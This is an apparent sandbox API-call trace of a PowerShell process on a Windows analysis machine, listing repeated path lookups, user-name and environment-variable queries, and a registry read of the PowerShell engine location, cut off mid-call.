1 [0065.004] SetErrorMode (uMode=0x1) returned 0x1 [0065.004] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.004] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.009] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.009] SetErrorMode (uMode=0x1) returned 0x1 [0065.009] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d5d0 | out: lpFileInformation=0x24d5d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.009] SetErrorMode (uMode=0x1) returned 0x1 [0065.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.052] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0065.052] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d938 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d938) returned 0x1 [0065.052] CoTaskMemFree (pv=0x1b990db0) [0065.052] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0065.052] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d978 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d978) returned 1 [0065.053] CoTaskMemFree (pv=0xe7050) [0065.054] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fee000*="Available", lpRawData=0x2fedd90) returned 1 [0065.055] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.055] CoTaskMemFree (pv=0x1b96d1e0) [0065.057] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.057] CoTaskMemFree (pv=0x1b96d1e0) [0065.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.083] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.083] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0065.083] CoTaskMemFree (pv=0x1b96d1e0) [0065.083] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.083] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0065.083] CoTaskMemFree (pv=0x1b96d1e0) [0065.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.085] GetCurrentProcessId () returned 0xac8 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d958 | out: phkResult=0x24d958*=0x370) returned 0x0 [0065.089] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8dc, lpData=0x0, lpcbData=0x24d8d8*=0x0 | out: lpType=0x24d8dc*=0x1, lpData=0x0, lpcbData=0x24d8d8*=0x56) returned 0x0 [0065.089] CoTaskMemAlloc (cb=0x5a) returned 0x1b964770 [0065.089] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8ac, lpData=0x1b964770, lpcbData=0x24d8a8*=0x56 | out: lpType=0x24d8ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d8a8*=0x56) returned 0x0 [0065.089] CoTaskMemFree (pv=0x1b964770) [0065.090] RegCloseKey (hKey=0x370) returned 0x0 [0065.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.100] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: 